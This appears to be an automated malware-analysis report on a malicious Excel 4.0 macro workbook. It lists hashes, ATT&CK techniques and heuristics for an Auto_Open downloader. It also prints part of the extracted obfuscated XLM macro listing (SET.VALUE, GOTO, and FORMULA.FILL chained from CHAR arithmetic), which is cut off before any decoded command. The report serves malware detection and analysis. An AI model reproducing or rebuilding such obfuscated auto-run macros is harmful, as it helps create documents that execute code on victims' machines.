Office (OLE) malware analysis — malicious · b5d3130bdad11b65

MALICIOUS

Office (OLE)

175.5 KB Created: 2020-05-12 12:42:25 Authoring application: Microsoft Excel First seen: 2020-09-15

MD5: 0ad3f23aa3e15b6e730734835a48178a SHA-1: 0264fa49dd9e50248877842fec595d71d927340c SHA-256: b5d3130bdad11b65f2e4e2997f0746739bd9d15f9e5ffbbcd1395960126ab615

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing arbitrary code upon opening the workbook. The dangerous formula APIs, specifically RUN, suggest the macro is intended to execute external commands. This points to a downloader or initial execution stage for a more complex attack.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126497 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	126497 bytes
SHA-256: `4d8b689e38543ca3534d5588512b919b1cdfe66610b6a2375ae3e0bfd3891ad9`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!ET6679 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,DI63,"",-0.45394736842105265495 ' Sheet,CT66,"",-319.75000000000000000000 ' Sheet,EB117,"",62.00000000000000000000 ' Sheet,HS136,"",260.70015625000002046363 ' Sheet,HZ186,"",-236.00000000000000000000 ' Sheet,IO208,"",0.10633946830265848804 ' Sheet,GF281,"",11.21951219512195052630 ' Sheet,IZ299,"",369.75000000000000000000 ' Sheet,BY317,"",0.48822269807280516130 ' Sheet,DJ317,"",-33.75000000000000000000 ' Sheet,FB380,"",0.17692307692307693290 ' Sheet,IB383,"",190.00000000000000000000 ' Sheet,JR478,"",-129.50000000000000000000 ' Sheet,ID543,"",-253.00000000000000000000 ' Sheet,DZ653,"",263.00000000000000000000 ' Sheet,FI685,"",-81.75000000000000000000 ' Sheet,JE733,"",-207.50000000000000000000 ' Sheet,FF777,"",-0.46710526315789474561 ' Sheet,ID789,"",432.00000000000000000000 ' Sheet,HN814,"",-0.35515695067264574369 ' Sheet,JF887,"",393.00000000000000000000 ' Sheet,IL907,"",200.70015624999999204192 ' Sheet,IC937,"",258.00000000000000000000 ' Sheet,JP943,"",6.34146341463414664474 ' Sheet,IZ948,"",-442.25000000000000000000 ' Sheet,EY959,"",3.09523809523809534383 ' Sheet,IB967,"",-397.75000000000000000000 ' Sheet,GP1108,"",-0.44078947368421050879 ' Sheet,GV1143,"",2.55882352941176449690 ' Sheet,DR1151,"",0.19212746016869730603 ' Sheet,HH1174,"",-158.00000000000000000000 ' Sheet,IF1175,"",-286.00000000000000000000 ' Sheet,GQ1186,"",-1.80952380952380953438 ' Sheet,BU1215,"",0.08695652173913043237 ' Sheet,FI1222,"SET.VALUE(ET59446,467/4)","" ' Sheet,FI1223,GOTO(GN14865),"" ' Sheet,I1252,"",0.36095764272559854868 ' Sheet,GY1266,"",397.00000000000000000000 ' Sheet,CF1276,"",0.19230769230769231837 ' Sheet,M1285,"",2.28571428571428558740 ' Sheet,FA1338,"",448.00000000000000000000 ' Sheet,GF1393,"",-384.25000000000000000000 ' Sheet,CF1421,"",0.16768916155419222314 ' Sheet,GA1446,"",-319.75000000000000000000 ' Sheet,GG1483,"",6.57500488281250028422 ' Sheet,V1564,"",0.23950617283950617620 ' Sheet,DO1577,"",3.56164383561643838050 ' Sheet,BO1701,"",214.00000000000000000000 ' Sheet,FE1712,"",0.22608695652173912971 ' Sheet,GF1800,"",6.52500488281249957367 ' Sheet,GX1806,"",-0.14708520179372197578 ' Sheet,B1829,"",-0.61764705882352943789 ' Sheet,BI1860,"",1.73469387755102033566 ' Sheet,IZ1864,"",5.36734693877551016783 ' Sheet,CO1882,"",264.70015625000002046363 ' Sheet,R1883,"",6.52000488281249968026 ' Sheet,BH1918,"",-0.34210526315789474561 ' Sheet,GT1944,"",-0.95287958115183246655 ' Sheet,R2048,"",0.61878453038674030573 ' Sheet,DJ2062,"",-148.50000000000000000000 ' Sheet,EY2202,"",2.45287356321839045137 ' Sheet,DO2211,"",168.00000000000000000000 ' Sheet,CV2215,"",415.00000000000000000000 ' Sheet,CW2223,"",-190.00000000000000000000 ' Sheet,DA2231,"",1.08101751851851868302 ' Sheet,DA2291,"",-1.20886075949367088889 ' Sheet,EL2390,"",4.26229408196721326618 ' Sheet,EL2403,"",2.42410714285714279370 ' Sheet,ED2474,"",72.75000000000000000000 ' Sheet,HB2491,"",0.35359116022099446042 ' Sheet,Q2503,"",0.21470588235294116308 ' Sheet,BR2516,"",219.00000000000000000000 ' Sheet,DT2525,"",-411.00000000000000000000 ' Sheet,DT2538,"",165.50000000000000000000 ' Sheet,IO2549,"",-0.29605263157894734505 ' Sheet,HF2565,"",-175.50000000000000000000 ' Sheet,EK2608,"",5.71641791044776148567 ' Sheet,CJ2617,"",216.00000000000000000000 ' Sheet,HD2628,"",399.00000000000000000000 ' Sheet,FQ2657,"",3.55263157894736858466 ' Sheet,EP2795,"",229.00000000000000000000 ' Sheet,IE2819,"FORMULA.FILL(CHAR(J40948/HE16344)&CHAR(FZ6216HF37440)&CHAR(J40948+DT2538)&CHAR(EY13227DO27970)&CHAR(HW56866*GK47609)&CHAR(DN52 ... (truncated)

SHA-256: 4d8b689e38543ca3534d5588512b919b1cdfe66610b6a2375ae3e0bfd3891ad9

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!ET6679 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,DI63,"",-0.45394736842105265495
'  Sheet,CT66,"",-319.75000000000000000000
'  Sheet,EB117,"",62.00000000000000000000
'  Sheet,HS136,"",260.70015625000002046363
'  Sheet,HZ186,"",-236.00000000000000000000
'  Sheet,IO208,"",0.10633946830265848804
'  Sheet,GF281,"",11.21951219512195052630
'  Sheet,IZ299,"",369.75000000000000000000
'  Sheet,BY317,"",0.48822269807280516130
'  Sheet,DJ317,"",-33.75000000000000000000
'  Sheet,FB380,"",0.17692307692307693290
'  Sheet,IB383,"",190.00000000000000000000
'  Sheet,JR478,"",-129.50000000000000000000
'  Sheet,ID543,"",-253.00000000000000000000
'  Sheet,DZ653,"",263.00000000000000000000
'  Sheet,FI685,"",-81.75000000000000000000
'  Sheet,JE733,"",-207.50000000000000000000
'  Sheet,FF777,"",-0.46710526315789474561
'  Sheet,ID789,"",432.00000000000000000000
'  Sheet,HN814,"",-0.35515695067264574369
'  Sheet,JF887,"",393.00000000000000000000
'  Sheet,IL907,"",200.70015624999999204192
'  Sheet,IC937,"",258.00000000000000000000
'  Sheet,JP943,"",6.34146341463414664474
'  Sheet,IZ948,"",-442.25000000000000000000
'  Sheet,EY959,"",3.09523809523809534383
'  Sheet,IB967,"",-397.75000000000000000000
'  Sheet,GP1108,"",-0.44078947368421050879
'  Sheet,GV1143,"",2.55882352941176449690
'  Sheet,DR1151,"",0.19212746016869730603
'  Sheet,HH1174,"",-158.00000000000000000000
'  Sheet,IF1175,"",-286.00000000000000000000
'  Sheet,GQ1186,"",-1.80952380952380953438
'  Sheet,BU1215,"",0.08695652173913043237
'  Sheet,FI1222,"SET.VALUE(ET59446,467/4)",""
'  Sheet,FI1223,GOTO(GN14865),""
'  Sheet,I1252,"",0.36095764272559854868
'  Sheet,GY1266,"",397.00000000000000000000
'  Sheet,CF1276,"",0.19230769230769231837
'  Sheet,M1285,"",2.28571428571428558740
'  Sheet,FA1338,"",448.00000000000000000000
'  Sheet,GF1393,"",-384.25000000000000000000
'  Sheet,CF1421,"",0.16768916155419222314
'  Sheet,GA1446,"",-319.75000000000000000000
'  Sheet,GG1483,"",6.57500488281250028422
'  Sheet,V1564,"",0.23950617283950617620
'  Sheet,DO1577,"",3.56164383561643838050
'  Sheet,BO1701,"",214.00000000000000000000
'  Sheet,FE1712,"",0.22608695652173912971
'  Sheet,GF1800,"",6.52500488281249957367
'  Sheet,GX1806,"",-0.14708520179372197578
'  Sheet,B1829,"",-0.61764705882352943789
'  Sheet,BI1860,"",1.73469387755102033566
'  Sheet,IZ1864,"",5.36734693877551016783
'  Sheet,CO1882,"",264.70015625000002046363
'  Sheet,R1883,"",6.52000488281249968026
'  Sheet,BH1918,"",-0.34210526315789474561
'  Sheet,GT1944,"",-0.95287958115183246655
'  Sheet,R2048,"",0.61878453038674030573
'  Sheet,DJ2062,"",-148.50000000000000000000
'  Sheet,EY2202,"",2.45287356321839045137
'  Sheet,DO2211,"",168.00000000000000000000
'  Sheet,CV2215,"",415.00000000000000000000
'  Sheet,CW2223,"",-190.00000000000000000000
'  Sheet,DA2231,"",1.08101751851851868302
'  Sheet,DA2291,"",-1.20886075949367088889
'  Sheet,EL2390,"",4.26229408196721326618
'  Sheet,EL2403,"",2.42410714285714279370
'  Sheet,ED2474,"",72.75000000000000000000
'  Sheet,HB2491,"",0.35359116022099446042
'  Sheet,Q2503,"",0.21470588235294116308
'  Sheet,BR2516,"",219.00000000000000000000
'  Sheet,DT2525,"",-411.00000000000000000000
'  Sheet,DT2538,"",165.50000000000000000000
'  Sheet,IO2549,"",-0.29605263157894734505
'  Sheet,HF2565,"",-175.50000000000000000000
'  Sheet,EK2608,"",5.71641791044776148567
'  Sheet,CJ2617,"",216.00000000000000000000
'  Sheet,HD2628,"",399.00000000000000000000
'  Sheet,FQ2657,"",3.55263157894736858466
'  Sheet,EP2795,"",229.00000000000000000000
'  Sheet,IE2819,"FORMULA.FILL(CHAR(J40948/HE16344)&CHAR(FZ6216*HF37440)&CHAR(J40948+DT2538)&CHAR(EY13227*DO27970)&CHAR(HW56866*GK47609)&CHAR(DN52
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.